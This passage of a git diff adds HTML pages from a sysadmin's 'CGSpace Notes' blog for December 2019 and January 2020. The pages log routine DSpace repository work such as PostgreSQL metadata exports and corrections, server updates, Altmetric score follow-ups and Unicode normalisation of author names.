+<li>Give <a href="https://hdl.handle.net/10568/106045">presentation about CG Core v2</a> to the MEL Developers&rsquo; Retreat in Nairobi, Kenya (via Skype)</li>
+<li>Send some pull requests to the cg-core schema repository:
+<ul>
+<li><a href="https://github.com/AgriculturalSemantics/cg-core/pull/16">HTML syntax fixes</a></li>
+<li><a href="https://github.com/AgriculturalSemantics/cg-core/pull/17">Add LICENSE file</a></li>
+<li><a href="https://github.com/AgriculturalSemantics/cg-core/pull/18">Build main.css using npm build</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-12-08">2019-12-08</h2>
+<ul>
+<li>Enrico noticed that the AReS Explorer on CGSpace (linode18) was down
+<ul>
+<li>I only see HTTP 502 in the nginx logs on CGSpace&hellip; so I assume it&rsquo;s something wrong with the AReS server</li>
+<li>I ran all system updates on the AReS server (linode20) and rebooted it</li>
+<li>After rebooting the Explorer was accessible again</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-12-09">2019-12-09</h2>
+<ul>
+<li>Update PostgreSQL JDBC driver to <a href="https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.9">version 42.2.9</a> in <a href="https://github.com/ilri/rmg-ansible-public">Ansible playbooks</a>
+<ul>
+<li>Deploy on DSpace Test (linode19) to test before deploying on CGSpace in a few days</li>
+</ul>
+</li>
+<li>Altmetric responded to my question about <a href="https://hdl.handle.net/10568/97087">the WLE item</a> that has a lower score than its DOI
+<ul>
+<li>They say that they will &ldquo;reprocess&rdquo; the item &ldquo;before Christmas&rdquo;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-12-11">2019-12-11</h2>
+<ul>
+<li>Post <a href="https://www.yammer.com/dspacedevelopers/#/Threads/show?threadId=454830191804416">message to Yammer about good practices for thumbnails on CGSpace</a>
+<ul>
+<li>On the topic of thumbnails, I&rsquo;m thinking we might want to force regenerate all PDF thumbnails on CGSpace since we upgraded it to Ubuntu 18.04 and got a new ghostscript&hellip;</li>
+</ul>
+</li>
+<li>More discussion about report formats for AReS</li>
+<li>Peter noticed that the Atmire reports weren&rsquo;t showing any statistics before 2019
+<ul>
+<li>I checked and indeed Solr had an issue loading some core last time it was started</li>
+<li>I restarted Tomcat three times before all cores came up successfully</li>
+</ul>
+</li>
+<li>While I was restarting the Tomcat service I upgraded the PostgreSQL JDBC driver to version 42.2.9, which had been deployed on DSpace Test earlier this week</li>
+</ul>
+<h2 id="2019-12-16">2019-12-16</h2>
+<ul>
+<li>Visit CodeObia office to discuss next phase of OpenRXV/AReS development
+<ul>
+<li>We discussed using CSV instead of Excel for tabular reports
+<ul>
+<li>OpenRXV should only have &ldquo;simple&rdquo; reports with Dublin Core fields</li>
+<li>AReS should have this as well as a customized &ldquo;extended&rdquo; report that has CRPs, Subjects, Sponsors, etc from CGSpace</li>
+</ul>
+</li>
+<li>We discussed using RTF instead of Word for graphical reports</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-12-17">2019-12-17</h2>
+<ul>
+<li>Start filing GitHub issues for the reporting features on OpenRXV and AReS
+<ul>
+<li>I created an issue for the &ldquo;simple&rdquo; tabular reports on OpenRXV GitHub (<a href="https://github.com/ilri/OpenRXV/issues/29">#29</a>)</li>
+<li>I created an issue for the &ldquo;extended&rdquo; tabular reports on AReS GitHub (<a href="https://github.com/ilri/AReS/issues/8">#8</a>)</li>
+<li>I created an issue for &ldquo;simple&rdquo; text reports on the OpenRXV GitHub (<a href="https://github.com/ilri/OpenRXV/issues/30">#30</a>)</li>
+<li>I created an issue for &ldquo;extended&rdquo; text reports on the AReS GitHub (<a href="https://github.com/ilri/AReS/issues/9">#9</a>)</li>
+</ul>
+</li>
+<li>I looked into creating RTF documents from HTML in Node.js and there is a library called <a href="https://www.npmjs.com/package/html-to-rtf">html-to-rtf</a> that works well, but doesn&rsquo;t support images</li>
+<li>Export a list of all investors (<code>dc.description.sponsorship</code>) for Peter to look through and correct:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.sponsor&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
+COPY 643
+</code></pre><h2 id="2019-12-18">2019-12-18</h2>
+<ul>
+<li>Apply the investor corrections and deletions from Peter on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
+$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
+</code></pre><ul>
+<li>Peter asked about the &ldquo;Open Government Licence 3.0&rdquo; that is used by <a href="">some items</a>
+<ul>
+<li>I notice that it <a href="https://spdx.org/licenses/OGL-UK-3.0.html">exists in SPDX as <code>UGL-UK-3.0</code></a> so I created a GitHub issue to add this to our controlled vocabulary (<a href="https://github.com/ilri/DSpace/issues/439">#439</a>)</li>
+<li>I only see two in our database that use this for now, so I will update them:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%Open%&#39;;
+         text_value          
+-----------------------------
+ Open Government License 3.0
+ Open Government License 3.0
+(2 rows)
+dspace=# UPDATE metadatavalue SET text_value=&#39;OGL-UK-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%Open Government License 3.0%&#39;;
+UPDATE 2
+</code></pre><ul>
+<li>I created a pull request to add the license and merged it to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/440">#440</a>)</li>
+<li>Add three new CCAFS Phase II project tags to CGSpace (<a href="https://github.com/ilri/DSpace/pull/441">#441</a>)</li>
+<li>Linode said DSpace Test (linode19) had an outbound traffic rate of 73Mb/sec for the last two hours
+<ul>
+<li>I see some Russian bot active in nginx&rsquo;s access logs:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c MegaIndex.ru 
+27320
+</code></pre><ul>
+<li>I see they <em>did</em> check <code>robots.txt</code> and their requests are only going to XMLUI item pages&hellip; so I guess I just leave them alone</li>
+<li>Peter wrote to ask why this <a href="https://cgspace.cgiar.org/handle/10568/101286">one WLE item</a> does <a href="https://api.altmetric.com/v1/handle/10568/101286">not have an Altmetric attention score</a>, but <a href="https://api.altmetric.com/v1/doi/10.1126/science.aaw0911">the DOI does</a>
+<ul>
+<li>I tweeted the item just in case, but Peter said that he already did it yesterday</li>
+<li>The item was added six months ago&hellip;</li>
+<li>The DOI has an Altmetric score of 259, but for the Handle it is HTTP 404!</li>
+<li>I emailed Altmetric support</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-12-22">2019-12-22</h2>
+<ul>
+<li>I ran the <code>dspace cleanup</code> process on CGSpace (linode18) and had an error:</li>
+</ul>
+<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(179441) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>The solution is to delete that bitstream manually:</li>
+</ul>
+<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);&#39;
+UPDATE 1
+</code></pre><ul>
+<li>Adjust <a href="/cgspace-notes/cgspace-cgcorev2-migration/">CG Core v2 migrataion notes</a> to use <code>cg.review-status</code> instead of <code>cg.peer-reviewed</code>
+<ul>
+<li>I had <a href="https://github.com/AgriculturalSemantics/cg-core/issues/14">raised the issue</a> with Marie-Angelique earlier this month</li>
+<li>It makes much more sense to use a wider scope here than a simple boolean</li>
+</ul>
+</li>
+<li>I also noticed another field that we should be using in DCTERMS instead of CG: <code>cg.targetaudience</code>
+<ul>
+<li><a href="https://www.dublincore.org/specifications/dublin-core/dcmi-terms/2012-06-14/?v=terms#audience">DCTERMS says that <code>dcterms.audience</code> should be used to describe a A class of entity for whom the resource is intended or useful.&quot;</a></li>
+<li>I will update my notes for this so that we use that field instead</li>
+<li>I don&rsquo;t see &ldquo;audience&rdquo; on the <a href="https://github.com/AgriculturalSemantics/cg-core/">cg-core</a> repository so I filed <a href="https://github.com/AgriculturalSemantics/cg-core/issues/19">an issue</a> to raise it with Marie-Angelique</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-12-23">2019-12-23</h2>
+<ul>
+<li>Follow up with Altmetric on the issue where <a href="https://hdl.handle.net/10568/97087">an item</a> has a different (lower) score for its Handle despite it having a correct DOI (with a higher score)
+<ul>
+<li>I&rsquo;ve raised this issue three times to Altmetric this year, and a few weeks ago they said they would re-process the item &ldquo;before Christmas&rdquo;</li>
+</ul>
+</li>
+<li>Abenet suggested we use <code>cg.reviewStatus</code> instead of <code>cg.review-status</code> and I agree that we should follow other examples like <code>DCTERMS.accessRights</code> and <code>DCTERMS.isPartOf</code>
+<ul>
+<li>I updated <a href="https://github.com/AgriculturalSemantics/cg-core/issues/14">my comment on the cg-core issue on GitHub</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-12-30">2019-12-30</h2>
+<ul>
+<li>Altmetric responded a few days ago about the <a href="https://hdl.handle.net/10568/97087">item</a> that has a different (lower) score for its Handle despite it having a correct DOI (with a higher score)
+<ul>
+<li>She tweeted the repository link and agreed that it didn&rsquo;t get picked up by Altmetric</li>
+<li>She said she will add this to the existing ticket about the previous items I had raised an issue about</li>
+</ul>
+</li>
+<li>Update Tomcat to version 7.0.99 in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a> and deploy on DSpace Test (linode19)</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2019/01/firebase-link-not-found.png b/docs/2019/01/firebase-link-not-found.png
new file mode 100644
index 000000000..0172daa29
Binary files /dev/null and b/docs/2019/01/firebase-link-not-found.png differ
diff --git a/docs/2019/01/solr-stats-correct.png b/docs/2019/01/solr-stats-correct.png
new file mode 100644
index 000000000..7a170d375
Binary files /dev/null and b/docs/2019/01/solr-stats-correct.png differ
diff --git a/docs/2019/01/solr-stats-incorrect.png b/docs/2019/01/solr-stats-incorrect.png
new file mode 100644
index 000000000..436372d7a
Binary files /dev/null and b/docs/2019/01/solr-stats-incorrect.png differ
diff --git a/docs/2019/02/iita-workflow-step1-empty.png b/docs/2019/02/iita-workflow-step1-empty.png
new file mode 100644
index 000000000..7fc9106d2
Binary files /dev/null and b/docs/2019/02/iita-workflow-step1-empty.png differ
diff --git a/docs/2019/02/statlets-working.png b/docs/2019/02/statlets-working.png
new file mode 100644
index 000000000..40a6e0e05
Binary files /dev/null and b/docs/2019/02/statlets-working.png differ
diff --git a/docs/2019/02/usage-stats.png b/docs/2019/02/usage-stats.png
new file mode 100644
index 000000000..a0d17434c
Binary files /dev/null and b/docs/2019/02/usage-stats.png differ
diff --git a/docs/2019/02/yasgui-agrovoc.png b/docs/2019/02/yasgui-agrovoc.png
new file mode 100644
index 000000000..6f869fffe
Binary files /dev/null and b/docs/2019/02/yasgui-agrovoc.png differ
diff --git a/docs/2019/03/cpu-day-fs8.png b/docs/2019/03/cpu-day-fs8.png
new file mode 100644
index 000000000..1a068b302
Binary files /dev/null and b/docs/2019/03/cpu-day-fs8.png differ
diff --git a/docs/2019/03/cpu-week-fs8.png b/docs/2019/03/cpu-week-fs8.png
new file mode 100644
index 000000000..38e357ded
Binary files /dev/null and b/docs/2019/03/cpu-week-fs8.png differ
diff --git a/docs/2019/03/cpu-week-migrated.png b/docs/2019/03/cpu-week-migrated.png
new file mode 100644
index 000000000..ac33d351a
Binary files /dev/null and b/docs/2019/03/cpu-week-migrated.png differ
diff --git a/docs/2019/03/cpu-year-fs8.png b/docs/2019/03/cpu-year-fs8.png
new file mode 100644
index 000000000..8573b582f
Binary files /dev/null and b/docs/2019/03/cpu-year-fs8.png differ
diff --git a/docs/2019/04/cpu-week.png b/docs/2019/04/cpu-week.png
new file mode 100644
index 000000000..06b95d262
Binary files /dev/null and b/docs/2019/04/cpu-week.png differ
diff --git a/docs/2019/04/cpu-week2.png b/docs/2019/04/cpu-week2.png
new file mode 100644
index 000000000..e2c3a7b6e
Binary files /dev/null and b/docs/2019/04/cpu-week2.png differ
diff --git a/docs/2019/04/cpu-week3.png b/docs/2019/04/cpu-week3.png
new file mode 100644
index 000000000..a3a75fb5b
Binary files /dev/null and b/docs/2019/04/cpu-week3.png differ
diff --git a/docs/2019/04/cpu-week4.png b/docs/2019/04/cpu-week4.png
new file mode 100644
index 000000000..481866c8e
Binary files /dev/null and b/docs/2019/04/cpu-week4.png differ
diff --git a/docs/2019/04/cpu-week5.png b/docs/2019/04/cpu-week5.png
new file mode 100644
index 000000000..46c7bd114
Binary files /dev/null and b/docs/2019/04/cpu-week5.png differ
diff --git a/docs/2019/04/visualvm-solr-indexing-16384-filterCache.png b/docs/2019/04/visualvm-solr-indexing-16384-filterCache.png
new file mode 100644
index 000000000..fa99be148
Binary files /dev/null and b/docs/2019/04/visualvm-solr-indexing-16384-filterCache.png differ
diff --git a/docs/2019/04/visualvm-solr-indexing-4096-filterCache.png b/docs/2019/04/visualvm-solr-indexing-4096-filterCache.png
new file mode 100644
index 000000000..a14977ba6
Binary files /dev/null and b/docs/2019/04/visualvm-solr-indexing-4096-filterCache.png differ
diff --git a/docs/2019/04/visualvm-solr-indexing-solr-settings.png b/docs/2019/04/visualvm-solr-indexing-solr-settings.png
new file mode 100644
index 000000000..873cc1cec
Binary files /dev/null and b/docs/2019/04/visualvm-solr-indexing-solr-settings.png differ
diff --git a/docs/2019/04/visualvm-solr-indexing.png b/docs/2019/04/visualvm-solr-indexing.png
new file mode 100644
index 000000000..197eb78e7
Binary files /dev/null and b/docs/2019/04/visualvm-solr-indexing.png differ
diff --git a/docs/2019/05/2019-05-06-cpu-day.png b/docs/2019/05/2019-05-06-cpu-day.png
new file mode 100644
index 000000000..3ac07ec51
Binary files /dev/null and b/docs/2019/05/2019-05-06-cpu-day.png differ
diff --git a/docs/2019/05/2019-05-06-fw_conntrack-day.png b/docs/2019/05/2019-05-06-fw_conntrack-day.png
new file mode 100644
index 000000000..ce253ef17
Binary files /dev/null and b/docs/2019/05/2019-05-06-fw_conntrack-day.png differ
diff --git a/docs/2019/05/2019-05-06-jmx_dspace_sessions-day.png b/docs/2019/05/2019-05-06-jmx_dspace_sessions-day.png
new file mode 100644
index 000000000..453a0a4f6
Binary files /dev/null and b/docs/2019/05/2019-05-06-jmx_dspace_sessions-day.png differ
diff --git a/docs/2019/05/2019-05-06-postgres_connections_db-day.png b/docs/2019/05/2019-05-06-postgres_connections_db-day.png
new file mode 100644
index 000000000..d4a7d3e97
Binary files /dev/null and b/docs/2019/05/2019-05-06-postgres_connections_db-day.png differ
diff --git a/docs/2019/05/2019-05-07-atmire-usage-week.png b/docs/2019/05/2019-05-07-atmire-usage-week.png
new file mode 100644
index 000000000..3cb3c925d
Binary files /dev/null and b/docs/2019/05/2019-05-07-atmire-usage-week.png differ
diff --git a/docs/2019/07/atmire-cua-2018-missing.png b/docs/2019/07/atmire-cua-2018-missing.png
new file mode 100644
index 000000000..eced2d3ec
Binary files /dev/null and b/docs/2019/07/atmire-cua-2018-missing.png differ
diff --git a/docs/2020-01/index.html b/docs/2020-01/index.html
new file mode 100644
index 000000000..412a715b7
--- /dev/null
+++ b/docs/2020-01/index.html
@@ -0,0 +1,658 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="January, 2020" />
+<meta property="og:description" content="2020-01-06
+
+Open a ticket with Atmire to request a quote for the upgrade to DSpace 6
+Last week Altmetric responded about the item that had a lower score than than its DOI
+
+The score is now linked to the DOI
+Another item that had the same problem in 2019 has now also linked to the score for its DOI
+Another item that had the same problem in 2019 has also been fixed
+
+
+
+2020-01-07
+
+Peter Ballantyne highlighted one more WLE item that is missing the Altmetric score that its DOI has
+
+The DOI has a score of 259, but the Handle has no score at all
+I tweeted the CGSpace repository link
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-01/" />
+<meta property="article:published_time" content="2020-01-06T10:48:30+02:00" />
+<meta property="article:modified_time" content="2021-09-20T15:47:34+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="January, 2020"/>
+<meta name="twitter:description" content="2020-01-06
+
+Open a ticket with Atmire to request a quote for the upgrade to DSpace 6
+Last week Altmetric responded about the item that had a lower score than than its DOI
+
+The score is now linked to the DOI
+Another item that had the same problem in 2019 has now also linked to the score for its DOI
+Another item that had the same problem in 2019 has also been fixed
+
+
+
+2020-01-07
+
+Peter Ballantyne highlighted one more WLE item that is missing the Altmetric score that its DOI has
+
+The DOI has a score of 259, but the Handle has no score at all
+I tweeted the CGSpace repository link
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "January, 2020",
+  "url": "https://alanorth.github.io/cgspace-notes/2020-01/",
+  "wordCount": "3523",
+  "datePublished": "2020-01-06T10:48:30+02:00",
+  "dateModified": "2021-09-20T15:47:34+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2020-01/">
+
+    <title>January, 2020 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-01/">January, 2020</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2020-01-06T10:48:30+02:00">Mon Jan 06, 2020</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-01-06">2020-01-06</h2>
+<ul>
+<li>Open <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706">a ticket</a> with Atmire to request a quote for the upgrade to DSpace 6</li>
+<li>Last week Altmetric responded about the <a href="https://hdl.handle.net/10568/97087">item</a> that had a lower score than than its DOI
+<ul>
+<li>The score is now linked to the DOI</li>
+<li>Another <a href="https://hdl.handle.net/10568/91278">item</a> that had the same problem in 2019 has now also linked to the score for its DOI</li>
+<li>Another <a href="https://hdl.handle.net/10568/81236">item</a> that had the same problem in 2019 has also been fixed</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-01-07">2020-01-07</h2>
+<ul>
+<li>Peter Ballantyne highlighted one more WLE <a href="https://hdl.handle.net/10568/101286">item</a> that is missing the Altmetric score that its DOI has
+<ul>
+<li>The DOI has a score of 259, but the Handle has no score at all</li>
+<li>I <a href="https://twitter.com/mralanorth/status/1214471427157626881">tweeted</a> the CGSpace repository link</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-01-08">2020-01-08</h2>
+<ul>
+<li>Export a list of authors from CGSpace for Peter Ballantyne to look through and correct:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
+COPY 68790
+</code></pre><ul>
+<li>As I always have encoding issues with files Peter sends, I tried to convert it to some Windows encoding, but got an error:</li>
+</ul>
+<pre tabindex="0"><code>$ iconv -f utf-8 -t windows-1252 /tmp/2020-01-08-authors.csv -o /tmp/2020-01-08-authors-windows.csv
+iconv: illegal input sequence at position 104779
+</code></pre><ul>
+<li>According to <a href="https://www.datafix.com.au/BASHing/2018-09-13.html">this trick</a> the troublesome character is on line 5227:</li>
+</ul>
+<pre tabindex="0"><code>$ awk &#39;END {print NR&#34;: &#34;$0}&#39; /tmp/2020-01-08-authors-windows.csv                                   
+5227: &#34;Oue
+$ sed -n &#39;5227p&#39; /tmp/2020-01-08-authors.csv | xxd -c1
+00000000: 22  &#34;
+00000001: 4f  O
+00000002: 75  u
+00000003: 65  e
+00000004: cc  .
+00000005: 81  .
+00000006: 64  d
+00000007: 72  r
+</code></pre><ul>
+<li><del>According to the blog post linked above the troublesome character is probably the &ldquo;High Octect Preset&rdquo; (81)</del>, which vim identifies (using <code>ga</code> on the character) as:</li>
+</ul>
+<pre tabindex="0"><code>&lt;e&gt;  101,  Hex 65,  Octal 145 &lt; ́&gt; 769, Hex 0301, Octal 1401
+</code></pre><ul>
+<li>If I understand the situation correctly it sounds like this means that the character is not actually encoded as UTF-8, so it&rsquo;s stored incorrectly in the database&hellip;</li>
+<li>Other encodings like <code>windows-1251</code> and <code>windows-1257</code> also fail on different characters like &ldquo;ž&rdquo; and &ldquo;é&rdquo; that <em>are</em> legitimate UTF-8 characters</li>
+<li>Then there is the issue of Russian, Chinese, etc characters, which are simply not representable in any of those encodings</li>
+<li>I think the solution is to upload it to Google Docs, or just send it to him and deal with each case manually in the corrections he sends me</li>
+<li>Re-deploy DSpace Test (linode19) with a fresh snapshot of the CGSpace database and assetstore, and using the <code>5_x-prod</code> (no CG Core v2) branch</li>
+</ul>
+<h2 id="2020-01-14">2020-01-14</h2>
+<ul>
+<li>I checked the yearly Solr statistics sharding cron job that should have run on 2020-01 on CGSpace (linode18) and saw that there was an error
+<ul>
+<li>I manually ran it on the server as the DSpace user and it said &ldquo;Moving: 51633080 into core statistics-2019&rdquo;</li>
+<li>After a few hours it died with the same error that I had seen in the log from the first run:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Exception: Read timed out
+java.net.SocketTimeoutException: Read timed out
+</code></pre><ul>
+<li>I am not sure how I will fix that shard&hellip;</li>
+<li>I discovered a very interesting tool called <a href="https://github.com/LuminosoInsight/python-ftfy">ftfy</a> that attempts to fix errors in UTF-8
+<ul>
+<li>I&rsquo;m curious to start checking input files with this to see what it highlights</li>
+<li>I ran it on the authors file from last week and it converted characters like those with Spanish accents from multi-byte sequences (I don&rsquo;t know what it&rsquo;s called?) to digraphs (é→é), which vim identifies as:</li>
+<li><code>&lt;e&gt;  101,  Hex 65,  Octal 145 &lt; ́&gt; 769, Hex 0301, Octal 1401</code></li>
+<li><code>&lt;é&gt; 233, Hex 00e9, Oct 351, Digr e'</code></li>
+</ul>
+</li>
+<li>Ah hah! We need to be <a href="https://withblue.ink/2019/03/11/why-you-need-to-normalize-unicode-strings.html">normalizing characters into their canonical forms</a>!
+<ul>
+<li>In Python 3.8 we can even <a href="https://docs.python.org/3/library/unicodedata.html">check if the string is normalized using the <code>unicodedata</code> library</a>:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>In [7]: unicodedata.is_normalized(&#39;NFC&#39;, &#39;é&#39;)
+Out[7]: False
+
+In [8]: unicodedata.is_normalized(&#39;NFC&#39;, &#39;é&#39;)
+Out[8]: True
+</code></pre><h2 id="2020-01-15">2020-01-15</h2>
+<ul>
+<li>I added support for Unicode normalization to my <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a> tool in <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.0">v0.4.0</a></li>
+<li>Generate ILRI and Bioversity subject lists for Elizabeth Arnaud from Bioversity:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.ilri&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
+COPY 144
+dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.bioversity&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
+COPY 1325
+</code></pre><ul>
+<li>She will be meeting with FAO and will look over the terms to see if they can add some to AGROVOC</li>
+<li>I noticed a few errors in the ILRI subjects so I fixed them locally and on CGSpace (linode18) using my <code>fix-metadata.py</code> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.ilri -m 203 -t correct -d
+</code></pre><h2 id="2020-01-16">2020-01-16</h2>
+<ul>
+<li>Extract a list of CIAT subjects from CGSpace for Elizabeth Arnaud from Bioversity:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.ciat&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
+COPY 35
+</code></pre><ul>
+<li>Start examining the 175 IITA records that Bosede originally sent in October, 2019 (201907.xls)
+<ul>
+<li>We had delayed processing them because DSpace Test (linode19) was testing CG Core v2 implementation for the last few months</li>
+<li>Sisay uploaded the records to DSpace Test as <a href="https://dspacetest.cgiar.org/handle/10568/106567">IITA_201907_Jan13</a></li>
+<li>I started first with basic sanity checks using my csv-metadata-quality tool and found twenty-two items with extra whitespace, invalid multi-value separators, and duplicates, which means Sisay did not do any quality checking on the data</li>
+<li>I corrected one invalid AGROVOC subject</li>
+<li>Validate and normalize affiliations against our 2019-04 list using reconcile-csv and OpenRefine:
+<ul>
+<li><code>$ lein run ~/src/git/DSpace/2019-04-08-affiliations.csv name id</code></li>
+<li>I always forget how to copy the reconciled values in OpenRefine, but you need to make a new column and populate it using this GREL: <code>if(cell.recon.matched, cell.recon.match.name, value)</code></li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-01-20">2020-01-20</h2>
+<ul>
+<li>Last week Atmire sent a quotation for the DSpace 6 upgrade that I had requested a few weeks ago
+<ul>
+<li>I forwarded it to Peter et al for their comment</li>
+<li>We decided that we should probably buy enough credits to cover the upgrade and have 100 remaining for future development</li>
+</ul>
+</li>
+<li>Visit CodeObia to discuss the next phase of AReS development</li>
+</ul>
+<h2 id="2020-01-21">2020-01-21</h2>
+<ul>
+<li>Create two accounts on CGSpace for CTA users</li>
+<li>Marie-Angelique finally responded to some of the pull requests I made on the CG Core v2 repository last month:
+<ul>
